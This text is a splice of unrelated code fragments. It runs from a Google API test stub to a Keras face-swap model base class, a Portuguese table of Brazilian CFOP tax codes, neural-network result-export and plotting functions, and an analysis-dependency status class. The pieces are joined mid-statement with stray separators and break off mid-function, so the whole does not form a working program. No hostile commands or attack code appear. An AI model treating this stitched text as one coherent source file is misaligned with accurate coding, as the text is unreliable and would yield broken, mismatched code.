credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the | |
#!/usr/bin/env python3
""" Base class for Models. ALL Models should at least inherit from this class
When inheriting model_data should be a list of NNMeta objects.
See the class for details.
"""
import logging
import os
import sys
import time
from json import JSONDecodeError
from shutil import copyfile, copytree
import keras
from keras import losses
from keras import backend as K
from keras.models import load_model, Model
from keras.optimizers import Adam
from keras.utils import get_custom_objects, multi_gpu_model
from lib import Serializer
from lib.model.losses import DSSIMObjective, PenalizedLoss
from lib.model.nn_blocks import NNBlocks
from lib.multithreading import MultiThread
from lib.utils import get_folder
from plugins.train._config import Config
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
_CONFIG = None
class ModelBase():
""" Base class that all models should inherit from """
def __init__(self,
model_dir,
gpus,
no_logs=False,
warp_to_landmarks=False,
no_flip=False,
training_image_size=256,
alignments_paths=None,
preview_scale=100,
input_shape=None,
encoder_dim=None,
trainer="original",
pingpong=False,
memory_saving_gradients=False,
predict=False):
        logger.debug("Initializing ModelBase (%s): (model_dir: '%s', gpus: %s, no_logs: %s, "
                     "training_image_size: %s, alignments_paths: %s, preview_scale: %s, "
"input_shape: %s, encoder_dim: %s, trainer: %s, pingpong: %s, "
"memory_saving_gradients: %s, predict: %s)",
self.__class__.__name__, model_dir, gpus, no_logs, training_image_size,
alignments_paths, preview_scale, input_shape, encoder_dim, trainer,
pingpong, memory_saving_gradients, predict)
self.predict = predict
self.model_dir = model_dir
self.gpus = gpus
self.blocks = NNBlocks(use_subpixel=self.config["subpixel_upscaling"],
use_icnr_init=self.config["icnr_init"],
use_reflect_padding=self.config["reflect_padding"])
self.input_shape = input_shape
self.output_shape = None # set after model is compiled
self.encoder_dim = encoder_dim
self.trainer = trainer
self.state = State(self.model_dir,
self.name,
self.config_changeable_items,
no_logs,
pingpong,
training_image_size)
self.is_legacy = False
self.rename_legacy()
self.load_state_info()
self.networks = dict() # Networks for the model
self.predictors = dict() # Predictors for model
        self.history = dict()  # Loss history per save iteration
# Training information specific to the model should be placed in this
# dict for reference by the trainer.
self.training_opts = {"alignments": alignments_paths,
"preview_scaling": preview_scale / 100,
"warp_to_landmarks": warp_to_landmarks,
"no_flip": no_flip,
"pingpong": pingpong}
self.set_gradient_type(memory_saving_gradients)
self.build()
self.set_training_data()
logger.debug("Initialized ModelBase (%s)", self.__class__.__name__)
@property
def config_section(self):
""" The section name for loading config """
retval = ".".join(self.__module__.split(".")[-2:])
logger.debug(retval)
return retval
@property
def config(self):
""" Return config dict for current plugin """
global _CONFIG # pylint: disable=global-statement
if not _CONFIG:
model_name = self.config_section
logger.debug("Loading config for: %s", model_name)
_CONFIG = Config(model_name).config_dict
return _CONFIG
@property
def config_changeable_items(self):
""" Return the dict of config items that can be updated after the model
has been created """
return Config(self.config_section).changeable_items
@property
def name(self):
""" Set the model name based on the subclass """
basename = os.path.basename(sys.modules[self.__module__].__file__)
retval = os.path.splitext(basename)[0].lower()
logger.debug("model name: '%s'", retval)
return retval
@property
def models_exist(self):
""" Return if all files exist and clear session """
        retval = all(os.path.isfile(model.filename) for model in self.networks.values())
logger.debug("Pre-existing models exist: %s", retval)
return retval
@staticmethod
def set_gradient_type(memory_saving_gradients):
""" Monkeypatch Memory Saving Gradients if requested """
if not memory_saving_gradients:
return
logger.info("Using Memory Saving Gradients")
from lib.model import memory_saving_gradients
K.__dict__["gradients"] = memory_saving_gradients.gradients_memory
def set_training_data(self):
        """ Override to set model specific training data.
        super() this method for defaults, otherwise be sure to add the required
        training_opts entries """
logger.debug("Setting training data")
self.training_opts["training_size"] = self.state.training_size
self.training_opts["no_logs"] = self.state.current_session["no_logs"]
self.training_opts["mask_type"] = self.config.get("mask_type", None)
self.training_opts["coverage_ratio"] = self.calculate_coverage_ratio()
self.training_opts["preview_images"] = 14
logger.debug("Set training data: %s", self.training_opts)
def calculate_coverage_ratio(self):
""" Coverage must be a ratio, leading to a cropped shape divisible by 2 """
coverage_ratio = self.config.get("coverage", 62.5) / 100
logger.debug("Requested coverage_ratio: %s", coverage_ratio)
cropped_size = (self.state.training_size * coverage_ratio) // 2 * 2
coverage_ratio = cropped_size / self.state.training_size
logger.debug("Final coverage_ratio: %s", coverage_ratio)
return coverage_ratio
def build(self):
""" Build the model. Override for custom build methods """
self.add_networks()
self.load_models(swapped=False)
self.build_autoencoders()
self.log_summary()
self.compile_predictors(initialize=True)
def build_autoencoders(self):
""" Override for Model Specific autoencoder builds
NB! ENSURE YOU NAME YOUR INPUTS. At least the following input names
are expected:
face (the input for image)
mask (the input for mask if it is used)
"""
raise NotImplementedError
def add_networks(self):
""" Override to add neural networks """
raise NotImplementedError
def load_state_info(self):
""" Load the input shape from state file if it exists """
logger.debug("Loading Input Shape from State file")
if not self.state.inputs:
logger.debug("No input shapes saved. Using model config")
return
if not self.state.face_shapes:
            logger.warning("Input shapes stored in State file, but no matches for 'face'. "
                           "Using model config")
return
input_shape = self.state.face_shapes[0]
logger.debug("Setting input shape from state file: %s", input_shape)
self.input_shape = input_shape
def add_network(self, network_type, side, network):
""" Add a NNMeta object """
logger.debug("network_type: '%s', side: '%s', network: '%s'", network_type, side, network)
filename = "{}_{}".format(self.name, network_type.lower())
name = network_type.lower()
if side:
side = side.lower()
filename += "_{}".format(side.upper())
name += "_{}".format(side)
filename += ".h5"
logger.debug("name: '%s', filename: '%s'", name, filename)
self.networks[name] = NNMeta(str(self.model_dir / filename), network_type, side, network)
def add_predictor(self, side, model):
""" Add a predictor to the predictors dictionary """
logger.debug("Adding predictor: (side: '%s', model: %s)", side, model)
if self.gpus > 1:
logger.debug("Converting to multi-gpu: side %s", side)
model = multi_gpu_model(model, self.gpus)
self.predictors[side] = model
if not self.state.inputs:
self.store_input_shapes(model)
if not self.output_shape:
self.set_output_shape(model)
def store_input_shapes(self, model):
""" Store the input and output shapes to state """
logger.debug("Adding input shapes to state for model")
inputs = {tensor.name: K.int_shape(tensor)[-3:] for tensor in model.inputs}
        if not any(inp.startswith("face") for inp in inputs):
raise ValueError("No input named 'face' was found. Check your input naming. "
"Current input names: {}".format(inputs))
self.state.inputs = inputs
logger.debug("Added input shapes: %s", self.state.inputs)
def set_output_shape(self, model):
""" Set the output shape for use in training and convert """
logger.debug("Setting output shape")
out = [K.int_shape(tensor)[-3:] for tensor in model.outputs]
if not out:
raise ValueError("No outputs found! Check your model.")
self.output_shape = tuple(out[0])
logger.debug("Added output shape: %s", self.output_shape)
def reset_pingpong(self):
""" Reset the models for pingpong training """
logger.debug("Resetting models")
# Clear models and graph
self.predictors = dict()
self.adversarial_autoencoders = dict()
K.clear_session()
# Load Models for current training run
for model in self.networks.values():
model.network = Model.from_config(model.config)
model.network.set_weights(model.weights)
self.build_autoencoders()
self.compile_predictors(initialize=False)
logger.debug("Reset models")
def compile_predictors(self, initialize=True):
""" Compile the predictors """
logger.debug("Compiling Predictors")
learning_rate = self.config.get("learning_rate", 5e-5)
optimizer = self.get_optimizer(lr=learning_rate, beta_1=0.5, beta_2=0.999)
for side, model in self.predictors.items():
mask = [inp for inp in model.inputs if inp.name.startswith("mask")]
loss_names = ["loss"]
loss_funcs = [self.loss_function(mask, side, initialize)]
if mask:
loss_names.append("mask_loss")
loss_funcs.append(self.mask_loss_function(side, initialize))
model.compile(optimizer=optimizer, loss=loss_funcs)
if len(loss_names) > 1:
loss_names.insert(0, "total_loss")
if initialize:
self.state.add_session_loss_names(side, loss_names)
self.history[side] = list()
logger.debug("Compiled Predictors. Losses: %s", loss_names)
def get_optimizer(self, lr=5e-5, beta_1=0.5, beta_2=0.999): # pylint: disable=invalid-name
""" Build and return Optimizer """
opt_kwargs = dict(lr=lr, beta_1=beta_1, beta_2=beta_2)
if (self.config.get("clipnorm", False) and
keras.backend.backend() != "plaidml.keras.backend"):
            # NB: Clipnorm is ballooning VRAM usage, which is not expected behaviour
# and may be a bug in Keras/TF.
# PlaidML has a bug regarding the clipnorm parameter
# See: https://github.com/plaidml/plaidml/issues/228
# Workaround by simply removing it.
# TODO: Remove this as soon it is fixed in PlaidML.
opt_kwargs["clipnorm"] = 1.0
logger.debug("Optimizer kwargs: %s", opt_kwargs)
return Adam(**opt_kwargs)
def loss_function(self, mask, side, initialize):
""" Set the loss function
Side is input so we only log once """
if self.config.get("dssim_loss", False):
if side == "a" and not self.predict and initialize:
logger.verbose("Using DSSIM Loss")
loss_func = DSSIMObjective()
else:
if side == "a" and not self.predict and initialize:
logger.verbose("Using Mean Absolute Error Loss")
loss_func = losses.mean_absolute_error
if mask and self.config.get("penalized_mask_loss", False):
loss_mask = mask[0]
if side == "a" and not self.predict and initialize:
logger.verbose("Penalizing mask for Loss")
loss_func = PenalizedLoss(loss_mask, loss_func)
return loss_func
def mask_loss_function(self, side, initialize):
""" Set the mask loss function
Side is input so we only log once """
if side == "a" and not self.predict and initialize:
logger.verbose("Using Mean Squared Error Loss for mask")
mask_loss_func = losses.mean_squared_error
return mask_loss_func
def converter(self, swap):
""" Converter for autoencoder models """
logger.debug("Getting Converter: (swap: %s)", swap)
if swap:
model = self.predictors["a"]
else:
model = self.predictors["b"]
if self.predict:
            # Must build the predict function up front to be thread safe
            model._make_predict_function()  # pylint: disable=protected-access
retval = model.predict
logger.debug("Got Converter: %s", retval)
return retval
@property
def iterations(self):
"Get current training iteration number"
return self.state.iterations
def map_models(self, swapped):
""" Map the models for A/B side for swapping """
logger.debug("Map models: (swapped: %s)", swapped)
models_map = {"a": dict(), "b": dict()}
sides = ("a", "b") if not swapped else ("b", "a")
for network in self.networks.values():
if network.side == sides[0]:
models_map["a"][network.type] = network.filename
if network.side == sides[1]:
models_map["b"][network.type] = network.filename
logger.debug("Mapped models: (models_map: %s)", models_map)
return models_map
def log_summary(self):
""" Verbose log the | |
ordem, já recebida do vendedor remetente',
'2122': 'Compra para industrialização em que a mercadoria foi remetida pelo fornecedor ao industrializador sem transitar pelo estabelecimento adquirente',
'2124': 'Industrialização efetuada por outra empresa',
'2125': 'Industrialização efetuada por outra empresa quando a mercadoria remetida para utilização no processo de industrialização não transitou pelo estabelecimento adquirente da mercadoria',
'2126': 'Compra para utilização na prestação de serviço sujeita ao ICMS',
'2128': 'Compra para utilização na prestação de serviço sujeita ao ISSQN',
'2131': 'Entrada de mercadoria com previsão de posterior ajuste ou fixação de preço, decorrente de operação de ato cooperativo.',
'2132': 'Fixação de preço de produção do estabelecimento produtor, inclusive quando remetidas anteriormente com previsão de posterior ajuste ou fixação de preço, em ato cooperativo, para comercialização.',
'2135': 'Fixação de preço de produção do estabelecimento produtor, inclusive quando remetidas anteriormente com previsão de posterior ajuste ou fixação de preço, em ato cooperativo, para industrialização.',
'2150': 'TRANSFERÊNCIAS PARA INDUSTRIALIZAÇÃO, PRODUÇÃO RURAL, COMERCIALIZAÇÃO OU PRESTAÇÃO DE SERVIÇOS',
'2151': 'Transferência para industrialização ou produção rural',
'2152': 'Transferência para comercialização',
'2153': 'Transferência de energia elétrica para distribuição',
'2154': 'Transferência para utilização na prestação de serviço',
'2159': 'Entrada decorrente do fornecimento de produto ou mercadoria de ato cooperativo',
'2200': 'DEVOLUÇÕES DE VENDAS DE PRODUÇÃO PRÓPRIA, DE TERCEIROS OU ANULAÇÕES DE VALORES',
'2201': 'Devolução de venda de produção do estabelecimento',
'2202': 'Devolução de venda de mercadoria adquirida ou recebida de terceiros',
'2203': 'Devolução de venda de produção do estabelecimento, destinada à Zona Franca de Manaus ou Áreas de Livre Comércio',
'2204': 'Devolução de venda de mercadoria adquirida ou recebida de terceiros, destinada à Zona Franca de Manaus ou Áreas de Livre Comércio',
'2205': 'Anulação de valor relativo à prestação de serviço de comunicação',
'2206': 'Anulação de valor relativo à prestação de serviço de transporte',
'2207': 'Anulação de valor relativo à venda de energia elétrica',
'2208': 'Devolução de produção do estabelecimento, remetida em transferência',
'2209': 'Devolução de mercadoria adquirida ou recebida de terceiros, remetida em transferência',
'2212': 'Devolução de venda no mercado interno de mercadoria industrializada e insumo importado sob o Regime Aduaneiro Especial de Entreposto Industrial sob Controle Informatizado do Sistema Público de Escrituração Digital (Recof-Sped).',
'2213': 'Devolução de remessa de produção do estabelecimento com previsão de posterior ajuste ou fixação de preço, em ato cooperativo.',
'2214': 'Devolução de fixação de preço de produção do estabelecimento produtor, de ato cooperativo.',
'2250': 'COMPRAS DE ENERGIA ELÉTRICA',
'2251': 'Compra de energia elétrica para distribuição ou comercialização',
'2252': 'Compra de energia elétrica por estabelecimento industrial',
'2253': 'Compra de energia elétrica por estabelecimento comercial',
'2254': 'Compra de energia elétrica por estabelecimento prestador de serviço de transporte',
'2255': 'Compra de energia elétrica por estabelecimento prestador de serviço de comunicação',
'2256': 'Compra de energia elétrica por estabelecimento de produtor rural',
'2257': 'Compra de energia elétrica para consumo por demanda contratada',
'2300': 'AQUISIÇÕES DE SERVIÇOS DE COMUNICAÇÃO',
'2301': 'Aquisição de serviço de comunicação para execução de serviço da mesma natureza',
'2302': 'Aquisição de serviço de comunicação por estabelecimento industrial',
'2303': 'Aquisição de serviço de comunicação por estabelecimento comercial',
'2304': 'Aquisição de serviço de comunicação por estabelecimento de prestador de serviço de transporte',
'2305': 'Aquisição de serviço de comunicação por estabelecimento de geradora ou de distribuidora de energia elétrica',
'2306': 'Aquisição de serviço de comunicação por estabelecimento de produtor rural',
'2350': 'AQUISIÇÕES DE SERVIÇOS DE TRANSPORTE',
'2351': 'Aquisição de serviço de transporte para execução de serviço da mesma natureza',
'2352': 'Aquisição de serviço de transporte por estabelecimento industrial',
'2353': 'Aquisição de serviço de transporte por estabelecimento comercial',
'2354': 'Aquisição de serviço de transporte por estabelecimento de prestador de serviço de comunicação',
'2355': 'Aquisição de serviço de transporte por estabelecimento de geradora ou de distribuidora de energia elétrica',
'2356': 'Aquisição de serviço de transporte por estabelecimento de produtor rural',
'2400': 'ENTRADAS DE MERCADORIAS SUJEITAS AO REGIME DE SUBSTITUIÇÃO TRIBUTÁRIA',
'2401': 'Compra para industrialização ou produção rural em operação com mercadoria sujeita ao regime de substituição tributária',
'2403': 'Compra para comercialização em operação com mercadoria sujeita ao regime de substituição tributária',
'2406': 'Compra de bem para o ativo imobilizado cuja mercadoria está sujeita ao regime de substituição tributária',
'2407': 'Compra de mercadoria para uso ou consumo cuja mercadoria está sujeita ao regime de substituição tributária',
'2408': 'Transferência para industrialização ou produção rural em operação com mercadoria sujeita ao regime de substituição tributária',
'2409': 'Transferência para comercialização em operação com mercadoria sujeita ao regime de substituição tributária',
'2410': 'Devolução de venda de produção do estabelecimento em operação com produto sujeito ao regime de substituição tributária',
'2411': 'Devolução de venda de mercadoria adquirida ou recebida de terceiros em operação com mercadoria sujeita ao regime de substituição tributária',
'2414': 'Retorno de produção do estabelecimento, remetida para venda fora do estabelecimento em operação com produto sujeito ao regime de substituição tributária',
'2415': 'Retorno de mercadoria adquirida ou recebida de terceiros, remetida para venda fora do estabelecimento em operação com mercadoria sujeita ao regime de substituição tributária',
'2500': 'ENTRADAS DE MERCADORIAS REMETIDAS PARA FORMAÇÃO DE LOTE OU COM FIM ESPECÍFICO DE EXPORTAÇÃO E EVENTUAIS DEVOLUÇÕES',
'2501': 'Entrada de mercadoria recebida com fim específico de exportação',
'2503': 'Entrada decorrente de devolução de produto remetido com fim específico de exportação, de produção do estabelecimento',
'2504': 'Entrada decorrente de devolução de mercadoria remetida com fim específico de exportação, adquirida ou recebida de terceiros',
'2505': 'Entrada decorrente de devolução de mercadorias remetidas para formação de lote de exportação, de produtos industrializados ou produzidos pelo próprio estabelecimento',
'2506': 'Entrada decorrente de devolução de mercadorias, adquiridas ou recebidas de terceiros, remetidas para formação de lote de exportação',
'2550': 'OPERAÇÕES COM BENS DE ATIVO IMOBILIZADO E MATERIAIS PARA USO OU CONSUMO',
'2551': 'Compra de bem para o ativo imobilizado',
'2552': 'Transferência de bem do ativo imobilizado',
'2553': 'Devolução de venda de bem do ativo imobilizado',
'2554': 'Retorno de bem do ativo imobilizado remetido para uso fora do estabelecimento',
'2555': 'Entrada de bem do ativo imobilizado de terceiro, remetido para uso no estabelecimento',
'2556': 'Compra de material para uso ou consumo',
'2557': 'Transferência de material para uso ou consumo',
'2600': 'CRÉDITOS E RESSARCIMENTOS DE ICMS',
'2603': 'Ressarcimento de ICMS retido por substituição tributária',
'2650': 'ENTRADAS DE COMBUSTÍVEIS, DERIVADOS OU NÃO DE PETRÓLEO E LUBRIFICANTES',
'2651': 'Compra de combustível ou lubrificante para industrialização subseqüente',
'2652': 'Compra de combustível ou lubrificante para comercialização',
'2653': 'Compra de combustível ou lubrificante por consumidor ou usuário final',
'2658': 'Transferência de combustível e lubrificante para industrialização',
'2659': 'Transferência de combustível e lubrificante para comercialização',
'2660': 'Devolução de venda de combustível ou lubrificante destinado à industrialização subseqüente',
'2661': 'Devolução de venda de combustível ou lubrificante destinado à comercialização',
'2662': 'Devolução de venda de combustível ou lubrificante destinado a consumidor ou usuário final',
'2663': 'Entrada de combustível ou lubrificante para armazenagem',
'2664': 'Retorno de combustível ou lubrificante remetido para armazenagem',
'2900': 'OUTRAS ENTRADAS DE MERCADORIAS OU AQUISIÇÕES DE SERVIÇOS',
'2901': 'Entrada para industrialização por encomenda',
'2902': 'Retorno de mercadoria remetida para industrialização por encomenda',
'2903': 'Entrada de mercadoria remetida para industrialização e não aplicada no referido processo',
'2904': 'Retorno de remessa para venda fora do estabelecimento',
'2905': 'Entrada de mercadoria recebida para depósito em depósito fechado ou armazém geral',
'2906': 'Retorno de mercadoria remetida para depósito fechado ou armazém geral',
'2907': 'Retorno simbólico de mercadoria remetida para depósito fechado ou armazém geral',
'2908': 'Entrada de bem por conta de contrato de comodato',
'2909': 'Retorno de bem remetido por conta de contrato de comodato',
'2910': 'Entrada de bonificação, doação ou brinde',
'2911': 'Entrada de amostra grátis',
'2912': 'Entrada de mercadoria ou bem recebido para demonstração ou mostruário.',
'2913': 'Retorno de mercadoria ou bem remetido para demonstração, mostruário ou treinamento.',
'2914': 'Retorno de mercadoria ou bem remetido para exposição ou feira',
'2915': 'Entrada de mercadoria ou bem recebido para conserto ou reparo',
'2916': 'Retorno de mercadoria ou bem remetido para conserto ou reparo',
'2917': 'Entrada de mercadoria recebida em consignação mercantil ou industrial',
'2918': 'Devolução de mercadoria remetida em consignação mercantil ou industrial',
'2919': 'Devolução simbólica de mercadoria vendida ou utilizada em processo industrial, remetida anteriormente em consignação mercantil ou industrial',
'2920': 'Entrada de vasilhame ou sacaria',
'2921': 'Retorno de vasilhame ou sacaria',
'2922': 'Lançamento efetuado a título de simples faturamento decorrente de compra para recebimento futuro',
'2923': 'Entrada de mercadoria recebida do vendedor remetente, em venda à ordem',
'2924': 'Entrada para industrialização por conta e ordem do adquirente da mercadoria, quando esta não transitar pelo estabelecimento do adquirente',
'2925': 'Retorno de mercadoria remetida para industrialização por
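A code table like this is normally consumed as a plain dict lookup. A minimal sketch (the name `CFOP_CODES` is an assumption; this fragment does not show the variable the dict is bound to):

```python
# Hypothetical name for the code table above; only two entries reproduced here.
CFOP_CODES = {
    '2551': 'Compra de bem para o ativo imobilizado',
    '2556': 'Compra de material para uso ou consumo',
}

def describe_cfop(code):
    """Return the CFOP description, or a fallback string for unknown codes."""
    return CFOP_CODES.get(code, 'CFOP desconhecido: {}'.format(code))
```

Using `.get()` with a fallback avoids a `KeyError` when a document carries a CFOP code that is not in the table.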
- len(line))
line_x = list(line)
line_x.extend(temp)
adjusted_weights.append(line_x)
np.savetxt(file_name, np.array(adjusted_weights), delimiter=",", fmt='%.18g')
elif save_type == 1: # All outputs
results, labels = data_to_save
ending = '\n'
# mode "a" creates the file if it does not exist, so no try/except fallback is needed
file_ann = open(file_name, "a")
now = dt.now()
file_ann.writelines(['======================\n', str(now) + '\n', '======================\n'])
for i, label in enumerate(labels):
crown = '-' * len(label) + '\n'
file_ann.writelines([crown, label + '\n']) # , crown])
if i < 6:
if i == 2: # Epochs errors
epochs = range(1, len(results[i]) + 1)
file_ann.writelines(remove_brackets(epochs) + '\n')
file_ann.writelines(remove_brackets(results[i]) + '\n')
else:
file_ann.writelines(remove_brackets(results[i]) + '\n')
else:
if i != 9:
for res in results[i]:
file_ann.writelines(remove_brackets(res) + '\n')
else:
for w in range(1):
for layer in results[i][w]:
file_ann.writelines(remove_brackets(layer) + '\n')
file_ann.writelines(remove_brackets(results[i][2]) + '\n')
file_ann.writelines(remove_brackets(results[i][3]) + '\n')
file_ann.writelines(ending)
file_ann.close()
elif save_type == 2:
file_ann = open(file_name, "a")
for line in data_to_save:
lne = [x for x in line[0]]
for m in range(1, len(line)):
lne.append(line[m])
clean_line = str(lne)
clean_line = clean_line.replace('[', '')
clean_line = clean_line.replace(']', '')
clean_line = clean_line.replace("'", "")
file_ann.writelines(clean_line + '\n')
file_ann.close()
elif save_type == 3:
file_ann = open(file_name, "a")
reformated = []
tmp = []
for item in range(len(data_to_save)):
tmp.append('Data ' + str(item))
tmp.append('Predicted ' + str(item))
reformated.append(tmp)
for item in range(len(data_to_save[0])):
tmp = []
for var in range(len(data_to_save)):
tmp.append(data_to_save[var][item][0])
tmp.append(data_to_save[var][item][1])
reformated.append(tmp)
for line in reformated:
# lne = [x for x in line[0]]
# for m in range(1, len(line)):
# lne.append(line[m])
clean_line = str(line) # str(lne)
clean_line = clean_line.replace('[', '')
clean_line = clean_line.replace(']', '')
clean_line = clean_line.replace("'", "")
file_ann.writelines(clean_line + '\n')
file_ann.close()
elif save_type == 4:
file_ann = open(file_name, "a")
for line in data_to_save:
clean_line = str(line) # str(lne)
clean_line = clean_line.replace('[', '')
clean_line = clean_line.replace(']', '')
clean_line = clean_line.replace("'", "")
file_ann.writelines(clean_line + '\n')
file_ann.close()
pass
def print_info(self, print_type, r=None):
# ann = self.ann
"""
Prints the required information to console in a formatted form
@param print_type: 0: # print_net_weights
1: # print_relative_importance
2: # print_correlation_coefficient
@param r: is the correlation_coefficients (if print_type=2)
"""
if print_type == 0: # print_net_weights
weights_of_i_h, weights_of_h_o, bias_of_i_h, bias_of_h_o = self.get_network_weights()
print_matrix('weights_of_i_h', weights_of_i_h)
print_matrix('bias_of_i_h', bias_of_i_h)
print_matrix('weights_of_h_o', weights_of_h_o)
print_matrix('bias_of_h_o', bias_of_h_o)
elif print_type == 1: # print_relative_importance
re100, re_negative = self.separate_relative_importance()
print()
print_matrix('relative_importance (+ve contribution)', re100)
print_matrix('relative_importance (real contribution)', re_negative)
elif print_type == 2: # print_correlation_coefficient
print_matrix('correlation_coefficients', r)
def prepare_output_file(self, error_list, stopping_epoch, tolerance, correlation_coefficients,
matrix_of_sum_of_errors, errors_collection,
relative_importance_100, relative_importance_negative, clear_file_state=True):
"""
Prepare the output file before printing
@param error_list: a list of cost values per epoch
@param stopping_epoch: the epoch the network converged at
@param tolerance: the registered tolerance that was fulfilled before convergence
@param correlation_coefficients: per input variable
@param matrix_of_sum_of_errors: Total Error, MSE, RMSE
@param errors_collection: Error details: (Total Error; MSE{per output}; RMSE{per output})
@param relative_importance_100: Relative contributions (+ve only):of each input (columns) to each output (rows)
@param relative_importance_negative: Relative contributions (real values): as above
@param clear_file_state: if True(Default), the data will be written to a clean file, else, appended to existing
"""
ann = self.ann
gross_network_results = [ann.get_structure(), ann.get_activation_functions(),
error_list, (stopping_epoch, tolerance), correlation_coefficients,
matrix_of_sum_of_errors, errors_collection,
relative_importance_100, relative_importance_negative,
self.get_network_weights()]
gross_network_labels = ['Network structure: , Inputs, Hidden, Outputs',
'Activation functions: 0= Sigmoid, 1= Tanh, 2= Softmax, for I-H, for H-O',
'Error advance: Total error at the end of each epoch',
'Run conditions: , Number of Epochs, Tolerance',
'Correlation coefficients: (A number per output)',
'Sum of errors: , Total Error, MSE, RMSE',
'Error details: (Total Error; MSE{per output}; RMSE{per output})',
'Relative contributions (+ve only): of each input (columns) to each output (rows)',
'Relative contributions (real values): of each input (columns) to each output (rows)',
'Weights and biases: Weights I-H (rows= inputs); a row for H bias; & other for O bias']
self.save_to_file(1, (gross_network_results, gross_network_labels), clear_file=clear_file_state)
# self.store_outputs_to_file(gross_network_results, gross_network_labels, clear_file_state)
pass
def get_normalized_input_line(self, input_line):
"""
Convert an input dataline to normalized form
@param input_line: the data in raw format
@return: data in normalized format
"""
norm_line = []
for i, cell in enumerate(input_line):
norm_data = self.source_data.input_variables[i].get_normalized_value(cell)
if not isinstance(norm_data, list): # only at the beginning
norm_line.append(norm_data)
else:
norm_line.extend(norm_data)
return norm_line
def get_de_normalized_output_line(self, output_line):
"""
Convert normalized outputs to readable raw format
@param output_line: list of normalized outputs
@return: list of readable output format
"""
var_map = self.get_variables_info('loc')
var_types_bool = self.get_variables_info('bool')
output_vars = self.source_data.output_variables
tmp = []
finished_output_variables = []
for o, out in enumerate(output_line):
if var_map[1][o] not in finished_output_variables:
if var_types_bool[1][o]: # Numeric output
tmp.append(output_vars[o].get_de_normalized_value(out))
finished_output_variables.append(var_map[1][o])
else:
rep = var_map[1].count(var_map[1][o])
tmp2 = output_line[o: o + rep]
# tmp2 = map(lambda x: 1 if x >= 0.5 else 0, tmp2)
tmp.append(output_vars[o].get_de_normalized_value(tmp2))
finished_output_variables.append(var_map[1][o])
return tmp
def graph_results(self, error_list, graphing_data_collection, optional_errors=None, partitioned_data=None,
initial_time=0):
"""
The most important routine in the program. To plot all results in an understandable form
@param error_list: the list of costs
@param graphing_data_collection: the data needed to plot all results
@param optional_errors: if there are some additional errors (like that of validation and testing)
@param partitioned_data: The way of partitioning data to TRN:VLD:TST
@param initial_time: the time at which the study started
@return: None; the routine only outputs graphs, either to PDF files or to on-screen windows
"""
figure_number = 0
figure_page = []
pages_titles = ['Cost function during simulation stages',
"The full neural network with weights' effects",
"Consolidated neural network with weights' effects",
"Relative importance of inputs to outputs",
"Prediction function and data cloud",
"Real vs. predicted data"]
# Limiting data points to a maximum of 1000 points to speed up drawing
max_len = 1000
limited_graphing_data_collection = []
for stage in graphing_data_collection:
if len(stage) > max_len:
guide = list(range(len(stage)))  # list() so the indices can be shuffled under Python 3
random.shuffle(guide)
guide = guide[:max_len]
dummy_ = []
for selected in guide:
dummy_.append(stage[selected])
limited_graphing_data_collection.append(dummy_)
else:
limited_graphing_data_collection.append(stage)
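The limiting step above (shuffle the indices, keep the first `max_len`) can also be expressed with `random.sample`, which draws without replacement in a single call; a sketch:

```python
import random

def limit_points(stage, max_len=1000):
    """Randomly keep at most max_len points (without replacement); order is not preserved."""
    if len(stage) <= max_len:
        return list(stage)
    return random.sample(stage, max_len)
```

This is behaviorally equivalent for plotting purposes, since the sampled points are an unordered subset either way.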
def save_graph_data(filename, x_and_y_list_of_tuples):
"""
A function to print the data of each graph page to a csv file
:param filename: the filename to be saved as
:param x_and_y_list_of_tuples: a list of several members, each member is a tuple, each tuple contains
2 members; GraphTitles and GraphData, GraphTitles is a tuple contains Chart Title, X Title, Y Title
GraphData is a tuple contains (X, Y) each as a list.
Example
x_and_y_list_of_tuples = [(('klkl vs yuyu', 'klkl in kg', 'yuyu in m'), (X, Y)),
(('klkl vs asdr', 'klkl in kg', 'asdr in s'), (X, Z)),
(('qwer vs yuyu', 'qwer in F', 'yuyu in m'), (F, Y)),
(('asdr vs mdfg', 'asdr in s', 'mdfg in N'), (Z, R))]
"""
file_name = self.new_folder_path + '\\' + filename
open(file_name, "w").close()
graph_file = open(file_name, "a")
chart_number = 0
for tup in x_and_y_list_of_tuples:
if len(tup[1][0]) > 0:
chart_number += 1
graph_file.writelines("Graph #" + str(chart_number) + '\n\n')
graph_file.writelines(tup[0][0] + '\n\n' + tup[0][1] + ", " + tup[0][2] + '\n')
for j in range(len(tup[1][0])):
line = str(tup[1][0][j])
for ij in range(1, len(tup[1])):
line += ", " + str(tup[1][ij][j])
graph_file.writelines(str(line) + '\n')
graph_file.writelines("\n===========================" + '\n\n')
graph_file.close()
def draw_cost_function():
"""
Draws the cost function(s) of training, testing, validation,
and all other costs like that of selecting structure
@return: A graphs figure
"""
titles_font = 16
labels_font = 14
caption_font = 25
# plt.rcParams["figure.figsize"] = [12, 9]
data_save_lists = [] # [() for i in range (5)]
y = error_list if optional_errors is None else optional_errors[0]
x = range(len(y))
plots_in_fig = (2, 6)
# Note that, unlike matplotlib’s subplot, the index of subplot2grid starts from 0 in gridspec.
ax1 = plt.subplot2grid(plots_in_fig, (0, 0), colspan=2)
plt.plot(x, y, 'r', marker='.')
chart_title = 'Error development during training' if optional_errors is None \
else 'Error development during early validation'
plt.title(chart_title, fontsize=titles_font, weight='bold', color='maroon')
plt.xlabel('Epochs', fontsize=labels_font, weight='bold')
plt.ylabel('Cost/error', fontsize=labels_font, weight='bold')
# plt.title(chart_title, weight='bold', color='maroon')
# plt.xlabel('Epochs', weight='bold')
# plt.ylabel('Cost/error', weight='bold')
plt.grid(True)
# saving data to file
data_save_lists.append(((chart_title, 'Epochs', 'Cost/error'), (x, y)))
if optional_errors is not None:
# ===============================================================
# Graphing the validation error
y = optional_errors[1]
x = range(len(y))
# Note that, unlike matplotlib’s subplot, the index of subplot2grid starts from 0 in gridspec.
ax1 = plt.subplot2grid(plots_in_fig, (0, 2), colspan=2)
plt.plot(x, y, 'b', marker='.')
plt.title('Error development during validation', fontsize=titles_font, weight='bold', color='maroon')
plt.xlabel('Epochs', fontsize=labels_font, weight='bold')
# plt.title('Error development during training', weight='bold', color='maroon')
AnalysisDependency.STATUS_RESOLVED
@property
def ready(self):
"""Returns True if target analysis has not been completed."""
return self.status == AnalysisDependency.STATUS_READY
@property
def completed(self):
"""Returns True if the target analysis has been completed."""
return self.status == AnalysisDependency.STATUS_COMPLETED
@property
def resolved(self):
"""Returns True if the source analysis has been completed."""
return self.status == AnalysisDependency.STATUS_RESOLVED
def increment_status(self):
